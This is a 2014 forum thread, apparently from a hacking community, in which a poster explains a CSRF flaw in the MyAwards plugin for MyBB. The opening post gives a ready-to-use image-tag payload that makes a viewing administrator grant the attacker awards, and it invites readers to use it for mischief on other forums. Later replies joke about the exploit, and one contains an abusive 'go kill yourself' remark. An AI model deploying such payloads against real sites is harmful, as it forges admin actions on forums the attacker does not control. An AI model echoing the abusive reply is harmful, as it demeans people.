Tutorial MyBB - MyAwards CSRF Vulnerability

Oni · 08-26-2014, 05:11 AM

This is a really simple, really stupid, vulnerability I heard of a few days ago. Didn't think it was worth a post, until I received a dozen PMs that we were possibly "vulnerable". Felt like sharing, in case you guys want to cause a bunch of mischief on another forum.

Figure out the ACP link for a MyBB forum using MyAwards.
Post a thread with the following image code on a (modified to your needs).

Code:
[img]https://www.sinister.ly/admin/index.php?module=user-awards&action=awards_do_grant&awid=4&username=Oni&awreason=loldongs[/img]
Wait for an administrator to view your "image".
Enjoy whatever pathetic awards you might want.

Dyme · 08-26-2014, 05:20 AM

Wow oni, I now see why you gave yourself that grey hat hacker award!

Shebang · 08-26-2014, 05:21 AM

I guess you fixed this on here, right? Tongue

Reiko · 08-26-2014, 05:22 AM

This is pretty funny, I gotta say.

Karma · 08-26-2014, 05:25 AM

(08-26-2014, 05:21 AM).Shebang Wrote: I guess you fixed this on here, right?

Would be pretty dumb if he wouldn't, mh? Tongue

MiS · 08-26-2014, 05:27 AM

(08-26-2014, 05:21 AM).Shebang Wrote: I guess you fixed this on here, right?

I was imagining someone with over 20 awards on SL as you said that :p

Equinox · 09-24-2014, 02:58 AM

Fun fact; you can give yourself invalid awards (if you know the admin dir)

Hope you had fun removing those awards, @Oni. Tongue

Oni · 09-24-2014, 02:59 AM

(09-24-2014, 02:58 AM)Equinox Wrote: Fun fact; you can give yourself invalid awards (if you know the admin dir)

Hope you had fun removing those awards, @Oni.

You can go kill yourself.

Fury · 09-24-2014, 03:14 AM

LOL This is awesome! Great share, hahaha!

MiS · 09-24-2014, 05:06 AM

(09-24-2014, 02:59 AM)Oni Wrote: You can go kill yourself.

no bulli allowed!